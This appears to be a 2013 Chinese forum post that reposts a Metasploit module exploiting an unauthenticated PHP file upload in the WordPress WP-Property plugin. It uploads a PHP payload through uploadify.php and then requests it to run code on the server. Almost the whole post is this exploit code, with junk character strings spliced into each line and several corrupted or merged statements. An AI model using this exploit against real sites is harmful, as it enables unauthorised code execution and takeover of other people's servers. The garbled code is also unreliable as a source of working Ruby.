WordPress WP-Property PHP 文件上传漏洞
& w- {0 a! S6 S* G u& {8 x1 }% b1 ?1 c: Z6 c
## # This file is part of the Metasploit Framework and may be subject to
* x$ N8 n+ \( O2 }( ^: r' z$ v2 J- W+ s4 d. G! H) C
# redistribution and commercial restrictions. Please see the Metasploit
8 w0 O6 l9 B% q% L% z' O; |5 E& [ W# F6 D, @2 w
# Framework web site for more information on licensing and terms of use.: ?8 p' }( x' S6 N
* b' M \$ x6 L* E# http://metasploit.com/framework/ ##
6 s9 J" D% L: f$ H& s+ L0 s+ F4 Y) q0 D6 u- t- ]; U( B
: V- h8 b# \7 T/ {4 T4 V' ~$ H* F5 o. j! a$ B
" B6 H0 Y. O) t- v, B; Z- t) m b# v5 z, B2 N+ Q4 b
require 'msf/core'! Q$ I1 @! a9 F6 \/ _/ }
require 'msf/core/exploit/php_exe'0 z/ K2 J! c: _
8 Y+ p0 N3 [8 o6 |9 M; T
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
2 o1 r3 t9 A& [7 ?6 u'Description' => %q{
# U( ~1 d+ n8 p8 x% W% j: V+ i% WThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
& g" @7 l0 g8 k[
: s4 b: K* t T'Sammy FORGIT', # initial discovery, ?) B+ t, M# w. Z; Y6 }( S0 Y
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
7 a' N" S; T, U+ l],
" g, q: ^% I6 c8 X6 f2 m& \# a0 N'License' => MSF_LICENSE,) k, v, c9 F8 [. ~
'References' =>
5 a. \9 ^$ ~* K7 l [ X* p[
0 ~1 X/ J4 t8 R* W8 ~5 {* O[ 'OSVDB', '82656' ],5 ? k2 Y( D K E( u* u
[ 'BID', '53787' ],; K# g9 a) f) G+ _, U3 e
[ 'EDB', '18987'],
! r2 I# y2 N7 o8 Q; }[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
- v) L( x# U4 j5 q# r+ m],
! }7 A; u O8 ]5 f2 u'Payload' =>
' v0 {# I# n e2 Z8 F{9 J5 l: p4 \) s
'BadChars' => "\x00",
* |9 D! Q) K/ a8 A/ P},
5 @9 D* ^4 n: N0 M'Platform' => 'php',
2 ^4 ?7 Z6 n3 l- J" @: T'Arch' => ARCH_PHP,2 M5 w; k" S4 m4 \9 q
'Targets' =>
7 f/ d3 X1 k: U. g' [ X[
$ P; A `1 `6 b% K( X5 Y# ]! K[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],1 z$ a2 \- i/ Y' u
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 w. v0 y% Y) K9 O+ g( t
],+ \3 B2 X" L( a; y
'DefaultTarget' => 0,
( x7 _( A. i; C'DisclosureDate' => 'Mar 26 2012'))' o" P3 F. |) L& C" f
. Z! ~ w! S; W# f9 d, y3 N# P. uregister_options(" L- W( ]/ m: \0 z
[
5 C7 }4 |" |' ~: B5 `OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
$ o7 Q( V$ |; L4 b( ?; z], self.class)! Z6 k, Z% k" U- D
end; H( B0 @2 A3 t
. K% `7 G6 Q1 t, Q: H' W0 {
def check9 P! W6 O7 P& H6 V, C
uri = target_uri.path
. g: ^. {3 {+ juri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',$ \+ |) V u5 O) H3 I" k
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"6 C8 ~& l q1 j% Q1 D. e
})+ o! C1 g! h, t1 O5 ]
3 l& b; Y( z5 W: _) j$ A9 a
if not res or res.code != 2002 w$ q: {- Z7 R6 N
return Exploit::CheckCode::Unknown
( f) S3 i) v3 M [) P- c6 [0 \+ g: rend
' C: D$ B2 q5 r0 Y+ Z0 q
4 {" |5 [8 \' y- r: p' V- Lreturn Exploit::CheckCode::Appears! H' q9 v; M# z" ]2 L% I
end' i& Q1 n v' r/ j
6 Z1 o; B7 S# y$ V1 A
def exploit
" j8 Q9 X& b R, buri = target_uri.path* \) l* k9 R7 d J$ s
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)! q) j) E Z3 }5 b
& O& e: C3 C( f, X
data = Rex::MIME::Message.new
; s" s% k! U$ X7 v9 Q, m. `data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
. B4 j5 [, ~# f& a' {# r6 Gdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
$ P# I5 V7 E( ?1 s9 f Lpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
# W4 z' _: {6 {5 a+ o
% |6 ]+ s' s3 W( m2 bprint_status("#{peer} - Uploading payload #{@payload_name}")1 E+ N, H" o3 ^! M$ h
res = send_request_cgi({% f/ B$ M+ j4 K& i
'method' => 'POST',+ C9 M' H5 J- K: N6 a0 d
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",6 P# M" m1 q# d0 {6 A' u( x
'ctype' => "multipart/form-data; boundary=#{data.bound}",( T) z% w* U% c6 q1 w$ m
'data' => post_data
+ E J' S, V: C9 \+ [% W8 J7 o; Q})
* w, d8 ]. E4 }, |0 u" u: Q2 D |: F8 s& K- N
if not res or res.code != 200 or res.body !~ /#{@payload_name}/$ t" X* f' j6 b$ r3 r
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed"); w( n R1 s2 l2 D0 T% a9 m7 u
end& h, _+ P/ t+ B5 a; \6 U
2 q) W) ?- O5 d% ~ o. L6 v
upload_uri = res.body, @) z K8 D7 u7 x }
6 b7 U, g2 A* a% Y. ? S! |% c
print_status("#{peer} - Executing payload #{@payload_name}")
$ t" x* z% J8 u6 p8 [! w* dres = send_request_raw({
" q8 \3 N2 Z3 \$ a& i'uri' => upload_uri,* U! T% R% V1 H
'method' => 'GET'* ]6 ~) a: F, |7 D" M5 O( ~
})5 n# ^# L1 Q3 f; ~2 d7 k: a- a4 A
end% y8 m: q) |' q+ }$ C8 {! m
end
! ~9 f* f" Q* ~
. e! I+ S* Y, x$ O- Y8 X不要问我这写的是什么 怎么利用 我是说msf.; P* w$ M1 G, A* o6 {! v6 O/ J5 L' V
& z# T6 Z$ A3 H) d
|
发表于 2013-1-4 19:51:30
收藏
支持
反对